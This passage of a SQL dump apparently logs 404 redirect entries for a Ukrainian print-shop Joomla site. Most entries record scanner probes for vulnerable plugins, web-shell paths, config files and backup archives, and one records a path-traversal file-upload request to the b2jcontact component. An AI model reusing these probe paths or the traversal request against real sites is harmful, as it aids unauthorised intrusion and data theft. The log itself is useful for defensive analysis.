00:00:00',301),(12878,'http://ekvatorprint.com.ua/upgrades.php',NULL,'http://site.ru','',2,0,'2018-02-23 14:48:47','0000-00-00 00:00:00',301),(12879,'http://ekvatorprint.com.ua/plugins/quickicon/quickicon.php',NULL,'http://site.ru','',1,0,'2018-02-23 17:01:00','0000-00-00 00:00:00',301),(12880,'http://ekvatorprint.com.ua/component/option,com_jfusion/Itemid,4/index.php?option=com_user&view=register',NULL,'http://ekvatorprint.com.ua/component/option,com_jfusion/Itemid,4/index.php?option=com_user&view=register','',1,0,'2018-02-25 01:39:13','0000-00-00 00:00:00',301),(12881,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1',NULL,'','',1,0,'2018-02-25 03:04:28','0000-00-00 00:00:00',301),(12882,'http://ekvatorprint.com.ua/index.php/create-an-account.html',NULL,'http://ekvatorprint.com.ua/index.php/create-an-account.html','',1,0,'2018-02-25 21:09:03','0000-00-00 00:00:00',301),(12883,'http://ekvatorprint.com.ua/demoistrator/index.php',NULL,'','',1,0,'2018-02-26 11:36:49','0000-00-00 00:00:00',301),(12884,'http://ekvatorprint.com.ua/components/com_jdownloads/jdownloads.php',NULL,'','',2,0,'2018-02-27 09:53:39','0000-00-00 00:00:00',301),(12885,'http://ekvatorprint.com.ua/wp-organizer.php',NULL,'http://site.ru','',4,0,'2018-02-27 12:20:07','0000-00-00 00:00:00',301),(12886,'http://ekvatorprint.com.ua/Pamelas.php',NULL,'http://site.ru','',5,0,'2018-02-27 12:21:04','0000-00-00 00:00:00',301),(12887,'http://ekvatorprint.com.ua/so.php',NULL,'http://site.ru','',2,0,'2018-02-27 13:02:15','0000-00-00 00:00:00',301),(12888,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css',NULL,'','',4,0,'2018-02-27 19:54:23','0000-00-00 00:00:00',301),(12889,'http://ekvatorprint.com.ua/shop/component/users/?view=registration',NULL,'http://ekvatorprint.com.ua/shop/component/users/?view=registration','',1,0,'2018-02-28 04:26:44','0000-00-00 00:00:00',301),(12890,'http://ekvatorprint.com.ua/kak',NULL,'','',1,0,'2018-02-28 16:01:17','0000-00-00 00:00:00',301),(12891,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',2,0,'2018-03-01 07:03:33','0000-00-00 00:00:00',301),(12892,'http://ekvatorprint.com.ua/components/com_sexycontactform/assets/js/index.html',NULL,'','',17,0,'2018-03-01 17:02:31','0000-00-00 00:00:00',301),(12893,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/admin/js/cherry-admin-plugin.js',NULL,'','',20,0,'2018-03-01 17:03:25','0000-00-00 00:00:00',301),(12894,'http://ekvatorprint.com.ua/wp-content/plugins/mailpress/mp-includes/js/mp_thickbox.js',NULL,'','',16,0,'2018-03-01 17:04:09','0000-00-00 00:00:00',301),(12895,'http://ekvatorprint.com.ua/wp-content/plugins/formidable/css/frm_fonts.css',NULL,'','',19,0,'2018-03-01 17:05:13','0000-00-00 00:00:00',301),(12896,'http://ekvatorprint.com.ua/wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/css/frontend.css',NULL,'','',18,0,'2018-03-01 17:06:01','0000-00-00 00:00:00',301),(12897,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/admin/admin_global.js',NULL,'','',19,0,'2018-03-01 17:07:59','0000-00-00 00:00:00',301),(12898,'http://ekvatorprint.com.ua/wp-content/plugins/php-event-calendar/js/file-uploader/app.js',NULL,'','',16,0,'2018-03-01 17:08:45','0000-00-00 00:00:00',301),(12899,'http://ekvatorprint.com.ua/wp-content/plugins/accesspress-anonymous-post-pro/js/admin-extra.js',NULL,'','',20,0,'2018-03-01 17:09:33','0000-00-00 00:00:00',301),(12900,'http://ekvatorprint.com.ua/wp-content/plugins/advanced-ajax-page-loader/reload_code.js',NULL,'','',19,0,'2018-03-01 17:10:32','0000-00-00 00:00:00',301),(12901,'http://ekvatorprint.com.ua/wp-content/plugins/real3d-flipbook/js/share.min.js',NULL,'','',17,0,'2018-03-01 17:11:24','0000-00-00 00:00:00',301),(12902,'http://ekvatorprint.com.ua/wp-content/plugins/wp-support-plus-responsive-ticket-system/asset/js/admin.js',NULL,'','',18,0,'2018-03-01 17:12:12','0000-00-00 00:00:00',301),(12903,'http://ekvatorprint.com.ua/wp-content/plugins/cardoza-facebook-like-box/admin_cardozafacebook.css',NULL,'','',21,0,'2018-03-01 17:13:17','0000-00-00 00:00:00',301),(12904,'http://ekvatorprint.com.ua/modules/pk_flexmenu/config.xml',NULL,'','',17,0,'2018-03-01 17:14:41','0000-00-00 00:00:00',301),(12905,'http://ekvatorprint.com.ua/modules/pk_vertflexmenu/config.xml',NULL,'','',14,0,'2018-03-01 17:16:08','0000-00-00 00:00:00',301),(12906,'http://ekvatorprint.com.ua/modules/homepageadvertise2/config.xml',NULL,'','',19,0,'2018-03-01 17:17:28','0000-00-00 00:00:00',301),(12907,'http://ekvatorprint.com.ua/modules/fieldvmegamenu/config.xml',NULL,'','',20,0,'2018-03-01 17:18:55','0000-00-00 00:00:00',301),(12908,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../max.php',NULL,'','',1,0,'2018-03-02 02:15:15','0000-00-00 00:00:00',301),(12909,'http://ekvatorprint.com.ua/components/max.php',NULL,'','',1,0,'2018-03-02 02:15:16','0000-00-00 00:00:00',301),(12910,'http://ekvatorprint.com.ua/components/com_joomanager/index.html',NULL,'','',1,0,'2018-03-02 02:19:44','0000-00-00 00:00:00',301),(12911,'http://ekvatorprint.com.ua/contact-ua',NULL,'','',2,0,'2018-03-02 15:46:30','0000-00-00 00:00:00',301),(12912,'http://ekvatorprint.com.ua/contact-us',NULL,'','',5,0,'2018-03-02 15:46:30','0000-00-00 00:00:00',301),(12913,'http://ekvatorprint.com.ua/about/contacts',NULL,'','',2,0,'2018-03-02 15:46:30','0000-00-00 00:00:00',301),(12914,'http://ekvatorprint.com.ua/kontakty',NULL,'','',3,0,'2018-03-02 15:46:30','0000-00-00 00:00:00',301),(12915,'http://ekvatorprint.com.ua/config-sample.php',NULL,'http://site.ru','',4,0,'2018-03-03 23:51:20','0000-00-00 00:00:00',301),(12916,'http://ekvatorprint.com.ua/.hg/hgrc',NULL,'','',1,0,'2018-03-04 03:58:48','0000-00-00 00:00:00',301),(12917,'http://ekvatorprint.com.ua/sftp_config.json',NULL,'','',1,0,'2018-03-04 03:58:48','0000-00-00 00:00:00',301),(12918,'http://ekvatorprint.com.ua/.idea/WebServers.xml',NULL,'','',2,0,'2018-03-04 03:58:48','0000-00-00 00:00:00',301),(12919,'http://ekvatorprint.com.ua/components/com_foxcontact/indoxploit_fIsTsb.php',NULL,'http://site.ru','',6,0,'2018-03-04 07:57:47','0000-00-00 00:00:00',301),(12920,'http://ekvatorprint.com.ua/bigm.php',NULL,'http://site.ru','',2,0,'2018-03-04 11:30:40','0000-00-00 00:00:00',301),(12921,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/wp-post.php',NULL,'http://site.ru','',1,0,'2018-03-04 14:52:20','0000-00-00 00:00:00',301),(12922,'http://ekvatorprint.com.ua/ler.php',NULL,'http://site.ru','',2,0,'2018-03-04 16:05:22','0000-00-00 00:00:00',301),(12923,'http://ekvatorprint.com.ua/3270.2158',NULL,'','',1,0,'2018-03-04 17:05:05','0000-00-00 00:00:00',301),(12924,'http://ekvatorprint.com.ua/components/com_foxcontact/line.php',NULL,'http://site.ru','',2,0,'2018-03-04 20:39:40','0000-00-00 00:00:00',301),(12925,'http://ekvatorprint.com.ua/contact-form.php',NULL,'','',1,0,'2018-03-04 22:03:35','0000-00-00 00:00:00',301),(12926,'http://ekvatorprint.com.ua/index.php/contactez-nous',NULL,'','',1,0,'2018-03-04 22:03:39','0000-00-00 00:00:00',301),(12927,'http://ekvatorprint.com.ua/nous-contacter',NULL,'','',1,0,'2018-03-04 22:03:41','0000-00-00 00:00:00',301),(12928,'http://ekvatorprint.com.ua/contactenos',NULL,'','',2,0,'2018-03-04 22:03:43','0000-00-00 00:00:00',301),(12929,'http://ekvatorprint.com.ua/contactanos',NULL,'','',1,0,'2018-03-04 22:03:48','0000-00-00 00:00:00',301),(12930,'http://ekvatorprint.com.ua/contattaci',NULL,'','',2,0,'2018-03-04 22:03:52','0000-00-00 00:00:00',301),(12931,'http://ekvatorprint.com.ua/index.php/kontakt',NULL,'','',3,0,'2018-03-04 22:03:54','0000-00-00 00:00:00',301),(12932,'http://ekvatorprint.com.ua/kontakt-os',NULL,'','',1,0,'2018-03-04 22:03:56','0000-00-00 00:00:00',301),(12933,'http://ekvatorprint.com.ua/contact-pog',NULL,'','',1,0,'2018-03-04 22:03:57','0000-00-00 00:00:00',301),(12934,'http://ekvatorprint.com.ua/contact-us.html',NULL,'','',1,0,'2018-03-04 22:04:00','0000-00-00 00:00:00',301),(12935,'http://ekvatorprint.com.ua/contacten.html',NULL,'','',1,0,'2018-03-04 22:04:02','0000-00-00 00:00:00',301),(12936,'http://ekvatorprint.com.ua/kontakty.html',NULL,'','',1,0,'2018-03-04 22:04:04','0000-00-00 00:00:00',301),(12937,'http://ekvatorprint.com.ua/android_contact_name',NULL,'','',1,0,'2018-03-04 22:04:11','0000-00-00 00:00:00',301),(12938,'http://ekvatorprint.com.ua/contactez-nous',NULL,'','',3,0,'2018-03-04 22:04:15','0000-00-00 00:00:00',301),(12939,'http://ekvatorprint.com.ua/contacto',NULL,'','',2,0,'2018-03-04 22:04:17','0000-00-00 00:00:00',301),(12940,'http://ekvatorprint.com.ua/contattarci',NULL,'','',1,0,'2018-03-04 22:04:20','0000-00-00 00:00:00',301),(12941,'http://ekvatorprint.com.ua/kontaktieren-sie-uns',NULL,'','',1,0,'2018-03-04 22:04:22','0000-00-00 00:00:00',301),(12942,'http://ekvatorprint.com.ua/contatti',NULL,'','',2,0,'2018-03-04 22:04:24','0000-00-00 00:00:00',301),(12943,'http://ekvatorprint.com.ua/susisiekite?id_contact=3&id_product=998',NULL,'','',1,0,'2018-03-04 22:04:30','0000-00-00 00:00:00',301),(12944,'http://ekvatorprint.com.ua/kontakti',NULL,'','',1,0,'2018-03-04 22:04:32','0000-00-00 00:00:00',301),(12945,'http://ekvatorprint.com.ua/contactus.htm',NULL,'','',1,0,'2018-03-04 22:04:38','0000-00-00 00:00:00',301),(12946,'http://ekvatorprint.com.ua/kundeservice',NULL,'','',1,0,'2018-03-04 22:04:41','0000-00-00 00:00:00',301),(12947,'http://ekvatorprint.com.ua/images/license.php',NULL,'http://site.ru','',10,0,'2018-03-04 23:18:32','0000-00-00 00:00:00',301),(12948,'http://ekvatorprint.com.ua/images/cgi.php',NULL,'http://site.ru','',1,0,'2018-03-05 00:58:54','0000-00-00 00:00:00',301),(12949,'http://ekvatorprint.com.ua/theme.php',NULL,'http://site.ru','',3,0,'2018-03-05 01:47:54','0000-00-00 00:00:00',301),(12950,'http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/',NULL,'','',1,0,'2018-03-05 04:17:42','0000-00-00 00:00:00',301),(12951,'http://ekvatorprint.com.ua/components/com_creativecontactform/fileupload/files/shell.php',NULL,'http://ekvatorprint.com.ua/components/com_creativecontactform/fileupload/files/shell.php','',1,0,'2018-03-05 06:46:45','0000-00-00 00:00:00',301),(12952,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/help.php',NULL,'http://site.ru','',1,0,'2018-03-05 07:33:54','0000-00-00 00:00:00',301),(12953,'http://ekvatorprint.com.ua/store/',NULL,'','',4,0,'2018-03-05 10:05:49','0000-00-00 00:00:00',301),(12954,'http://ekvatorprint.com.ua/shop/',NULL,'','',4,0,'2018-03-05 10:05:59','0000-00-00 00:00:00',301),(12955,'http://ekvatorprint.com.ua/catalog/',NULL,'','',4,0,'2018-03-05 10:06:08','0000-00-00 00:00:00',301),(12956,'http://ekvatorprint.com.ua/cart/',NULL,'','',3,0,'2018-03-05 10:06:18','0000-00-00 00:00:00',301),(12957,'http://ekvatorprint.com.ua/wp-seo.php',NULL,'http://site.ru','',7,0,'2018-03-05 10:40:09','0000-00-00 00:00:00',301),(12958,'http://ekvatorprint.com.ua/_.php',NULL,'http://site.ru','',3,0,'2018-03-05 11:22:11','0000-00-00 00:00:00',301),(12959,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.tar.gz',NULL,'','',1,0,'2018-03-05 17:48:33','0000-00-00 00:00:00',301),(12960,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.zip',NULL,'','',1,0,'2018-03-05 17:48:34','0000-00-00 00:00:00',301),(12961,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.rar',NULL,'','',1,0,'2018-03-05 17:48:34','0000-00-00 00:00:00',301),(12962,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.sql',NULL,'','',1,0,'2018-03-05 17:48:35','0000-00-00 00:00:00',301),(12963,'http://ekvatorprint.com.ua/ekvatorprintcomua.tar.gz',NULL,'','',1,0,'2018-03-05 17:48:35','0000-00-00 00:00:00',301),(12964,'http://ekvatorprint.com.ua/ekvatorprintcomua.zip',NULL,'','',1,0,'2018-03-05 17:48:36','0000-00-00 00:00:00',301),(12965,'http://ekvatorprint.com.ua/ekvatorprintcomua.rar',NULL,'','',1,0,'2018-03-05 17:48:36','0000-00-00 00:00:00',301),(12966,'http://ekvatorprint.com.ua/ekvatorprintcomua.sql',NULL,'','',1,0,'2018-03-05 17:48:37','0000-00-00 00:00:00',301),(12967,'http://ekvatorprint.com.ua/com.ua.tar.gz',NULL,'','',1,0,'2018-03-05 17:48:44','0000-00-00 00:00:00',301),(12968,'http://ekvatorprint.com.ua/com.ua.zip',NULL,'','',1,0,'2018-03-05 17:48:45','0000-00-00 00:00:00',301),(12969,'http://ekvatorprint.com.ua/com.ua.rar',NULL,'','',1,0,'2018-03-05 17:48:46','0000-00-00 00:00:00',301),(12970,'http://ekvatorprint.com.ua/com.ua.sql',NULL,'','',1,0,'2018-03-05 17:48:47','0000-00-00 00:00:00',301),(12971,'http://ekvatorprint.com.ua/com.rar',NULL,'','',1,0,'2018-03-05 17:48:47','0000-00-00 00:00:00',301),(12972,'http://ekvatorprint.com.ua/com.zip',NULL,'','',2,0,'2018-03-05 17:48:48','0000-00-00 00:00:00',301),(12973,'http://ekvatorprint.com.ua/com.tar.gz',NULL,'','',2,0,'2018-03-05 17:48:48','0000-00-00 00:00:00',301),(12974,'http://ekvatorprint.com.ua/com.sql',NULL,'','',2,0,'2018-03-05 17:48:49','0000-00-00 00:00:00',301),(12975,'http://ekvatorprint.com.ua/ekvatorprint-com-ua.rar',NULL,'','',2,0,'2018-03-05 17:48:50','0000-00-00 00:00:00',301),(12976,'http://ekvatorprint.com.ua/ekvatorprint-com-ua.zip',NULL,'','',2,0,'2018-03-05 17:48:50','0000-00-00 00:00:00',301),(12977,'http://ekvatorprint.com.ua/ekvatorprint-com-ua.tar.gz',NULL,'','',2,0,'2018-03-05 17:48:50','0000-00-00 00:00:00',301),(12978,'http://ekvatorprint.com.ua/ekvatorprint-com-ua.sql',NULL,'','',2,0,'2018-03-05 17:48:51','0000-00-00 00:00:00',301),(12979,'http://ekvatorprint.com.ua/public.tar.gz',NULL,'','',2,0,'2018-03-05 17:48:52','0000-00-00 00:00:00',301),(12980,'http://ekvatorprint.com.ua/public.zip',NULL,'','',2,0,'2018-03-05 17:48:53','0000-00-00 00:00:00',301),(12981,'http://ekvatorprint.com.ua/public.rar',NULL,'','',2,0,'2018-03-05 17:48:53','0000-00-00 00:00:00',301),(12982,'http://ekvatorprint.com.ua/2609.2905',NULL,'','',1,0,'2018-03-05 19:18:24','0000-00-00 00:00:00',301),(12983,'http://ekvatorprint.com.ua/components/com_b2jcontact/js/fileuploader.js',NULL,'','',6,0,'2018-03-11 03:58:45','0000-00-00 00:00:00',301),(12984,'http://ekvatorprint.com.ua/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','',1,0,'2018-03-11 10:29:38','0000-00-00 00:00:00',301),(12985,'http://ekvatorprint.com.ua/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',2,0,'2018-03-12 09:54:09','0000-00-00 00:00:00',301),(12986,'http://ekvatorprint.com.ua/g;m.parentnode.insertbefore',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-12 11:55:31','0000-00-00 00:00:00',301),(12987,'http://ekvatorprint.com.ua/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css','',4,0,'2018-03-12 15:03:09','0000-00-00 00:00:00',301),(12988,'http://ekvatorprint.com.ua/components/com_adsmanager/js/fullnoconflict.js',NULL,'','',22,0,'2018-03-12 17:11:48','0000-00-00 00:00:00',301),(12989,'http://ekvatorprint.com.ua/components/com_foxcontact/js/jtext.js',NULL,'','',11,0,'2018-03-12 17:16:13','0000-00-00 00:00:00',301),(12990,'http://ekvatorprint.com.ua/wp-content/plugins/website-contact-form-with-file-upload/js/nm-global.js',NULL,'','',9,0,'2018-03-12 17:25:53','0000-00-00 00:00:00',301),(12991,'http://ekvatorprint.com.ua/wp-content/plugins/font-uploader/fontFunctions/fu_script.js',NULL,'','',11,0,'2018-03-12 18:02:41','0000-00-00 00:00:00',301),(12992,'http://ekvatorprint.com.ua/wp-content/plugins/woocommerce-product-addon/js/nm-global.js',NULL,'','',6,0,'2018-03-12 18:17:13','0000-00-00 00:00:00',301),(12993,'http://ekvatorprint.com.ua/wp-content/plugins/showbiz/css/post_settings.css',NULL,'','',5,0,'2018-03-12 18:22:00','0000-00-00 00:00:00',301),(12994,'http://ekvatorprint.com.ua/modules/columnadverts/config.xml',NULL,'','',10,0,'2018-03-12 18:45:29','0000-00-00 00:00:00',301),(12995,'http://ekvatorprint.com.ua/modules/homepageadvertise/config.xml',NULL,'','',16,0,'2018-03-12 18:59:43','0000-00-00 00:00:00',301),(12996,'http://ekvatorprint.com.ua/modules/attributewizardpro/config.xml',NULL,'','',6,0,'2018-03-12 19:04:24','0000-00-00 00:00:00',301),(12997,'http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php','',1,0,'2018-03-13 02:06:21','0000-00-00 00:00:00',301),(12998,'http://ekvatorprint.com.ua/sz.php?rxr',NULL,'','',1,0,'2018-03-13 04:28:11','0000-00-00 00:00:00',301),(12999,'http://ekvatorprint.com.ua/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','',3,0,'2018-03-13 09:19:15','0000-00-00 00:00:00',301),(13000,'http://ekvatorprint.com.ua/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css','',3,0,'2018-03-14 10:53:11','0000-00-00 00:00:00',301),(13001,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/','',1,0,'2018-03-14 10:53:14','0000-00-00 00:00:00',301),(13002,'http://ekvatorprint.com.ua/assets/js/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/assets/js/uploadify/uploadify.css','',1,0,'2018-03-17 02:03:51','0000-00-00 00:00:00',301),(13003,'http://ekvatorprint.com.ua/components/com_fabrik/language/en-GB/en-GB.com_fabrik.ini',NULL,'ekvatorprint.com.ua//components/com_fabrik/language/en-GB/en-GB.com_fabrik.ini','',1,0,'2018-03-18 12:49:52','0000-00-00 00:00:00',301),(13004,'http://ekvatorprint.com.ua/modules/mod_search/tmpl/defaults.php',NULL,'ekvatorprint.com.ua','',2,0,'2018-03-19 16:05:23','0000-00-00 00:00:00',301),(13005,'http://ekvatorprint.com.ua/libraries/joomla/cache/storage/memcaches.php',NULL,'ekvatorprint.com.ua','',2,0,'2018-03-19 16:06:04','0000-00-00 00:00:00',301),(13006,'http://ekvatorprint.com.ua/sitebackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-20 08:21:52','0000-00-00 00:00:00',301),(13007,'http://ekvatorprint.com.ua/vm-backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-20 10:01:19','0000-00-00 00:00:00',301),(13008,'http://ekvatorprint.com.ua/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2018-03-21 22:26:52','0000-00-00 00:00:00',301),(13009,'http://ekvatorprint.com.ua/an.php',NULL,'','',1,0,'2018-03-21 22:30:40','0000-00-00 00:00:00',301),(13010,'http://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/image/ico/search.php',NULL,'','',2,0,'2018-03-21 22:31:12','0000-00-00 00:00:00',301),(13011,'http://ekvatorprint.com.ua/wp-dbs.php',NULL,'','',1,0,'2018-03-21 22:31:29','0000-00-00 00:00:00',301),(13012,'http://ekvatorprint.com.ua/assets/super_admin/vendor/jquery-file-upload/server/php',NULL,'http://ekvatorprint.com.ua/assets/super_admin/vendor/jquery-file-upload/server/php','',1,0,'2018-03-22 02:14:27','0000-00-00 00:00:00',301),(13013,'http://ekvatorprint.com.ua/backup/2015/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-22 08:47:13','0000-00-00 00:00:00',301),(13014,'http://ekvatorprint.com.ua/backup/2017-03/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-23 13:53:42','0000-00-00 00:00:00',301),(13015,'http://ekvatorprint.com.ua/wp-content/plugins/jssor-slider/assets/css/system-message.css',NULL,'','',3,0,'2018-03-23 16:39:39','0000-00-00 00:00:00',301),(13016,'http://ekvatorprint.com.ua/modules/wdoptionpanel/config.xml',NULL,'','',7,0,'2018-03-23 16:52:35','0000-00-00 00:00:00',301),(13017,'http://ekvatorprint.com.ua/components/com_b2jcontact/css/b2jcontact.css',NULL,'','',2,0,'2018-03-24 06:39:18','0000-00-00 00:00:00',301),(13018,'http://ekvatorprint.com.ua/backup10/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-24 12:18:18','0000-00-00 00:00:00',301),(13019,'http://ekvatorprint.com.ua/modulnye-kartiny@10',NULL,'http://ekvatorprint.com.ua/modulnye-kartiny%4010','',5,0,'2018-03-24 12:58:18','0000-00-00 00:00:00',301),(13020,'http://ekvatorprint.com.ua/backup11/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-24 14:03:13','0000-00-00 00:00:00',301),(13021,'http://ekvatorprint.com.ua/backup12/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-24 15:46:56','0000-00-00 00:00:00',301),(13022,'http://ekvatorprint.com.ua/backup files/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-24 19:15:21','0000-00-00 00:00:00',301),(13023,'http://ekvatorprint.com.ua/backupexec/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-24 20:58:44','0000-00-00 00:00:00',301),(13024,'http://ekvatorprint.com.ua/_dbbackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-25 19:32:47','0000-00-00 00:00:00',301),(13025,'http://ekvatorprint.com.ua/dbbackup_/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-25 21:17:18','0000-00-00 00:00:00',301),(13026,'http://ekvatorprint.com.ua/mybackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 00:45:42','0000-00-00 00:00:00',301),(13027,'http://ekvatorprint.com.ua/rvsDbBackup.sql',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 02:31:22','0000-00-00 00:00:00',301),(13028,'http://ekvatorprint.com.ua/wpau-backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 04:16:06','0000-00-00 00:00:00',301),(13029,'http://ekvatorprint.com.ua/_backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 06:01:42','0000-00-00 00:00:00',301),(13030,'http://ekvatorprint.com.ua/autobackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 07:47:42','0000-00-00 00:00:00',301),(13031,'http://ekvatorprint.com.ua/backup-db/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 09:33:09','0000-00-00 00:00:00',301),(13032,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/README.md',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/cherry-plugin/README.md','',1,0,'2018-03-26 10:40:51','0000-00-00 00:00:00',301),(13033,'http://ekvatorprint.com.ua/backupdb/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 11:17:34','0000-00-00 00:00:00',301),(13034,'http://ekvatorprint.com.ua/vdsbackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-03-26 13:02:45','0000-00-00 00:00:00',301),(13035,'http://ekvatorprint.com.ua/@10',NULL,'http://ekvatorprint.com.ua/%4010','',4,0,'2018-03-27 00:31:19','0000-00-00 00:00:00',301),(13036,'http://ekvatorprint.com.ua/ckupload/ckupload.php',NULL,'','',1,0,'2018-03-27 07:56:03','0000-00-00 00:00:00',301),(13037,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/uploadify.php','',8,0,'2018-03-28 03:29:08','0000-00-00 00:00:00',301),(13038,'http://ekvatorprint.com.ua/components/com_foxcontact/index.html',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/index.html','',1,0,'2018-03-28 17:46:00','0000-00-00 00:00:00',301),(13039,'http://ekvatorprint.com.ua/wp-content/plugins/wp-dreamworkgallery/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-dreamworkgallery/readme.txt','',3,0,'2018-03-28 20:18:04','0000-00-00 00:00:00',301),(13040,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:40','0000-00-00 00:00:00',301),(13041,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:40','0000-00-00 00:00:00',301),(13042,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:40','0000-00-00 00:00:00',301),(13043,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13044,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13045,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13046,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13047,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13048,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13049,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:41','0000-00-00 00:00:00',301),(13050,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13051,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13052,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13053,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13054,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13055,'http://ekvatorprint.com.ua/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:07:42','0000-00-00 00:00:00',301),(13056,'http://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/пло',NULL,'','',1,0,'2018-03-29 22:08:11','0000-00-00 00:00:00',301),(13057,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13058,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13059,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13060,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13061,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13062,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 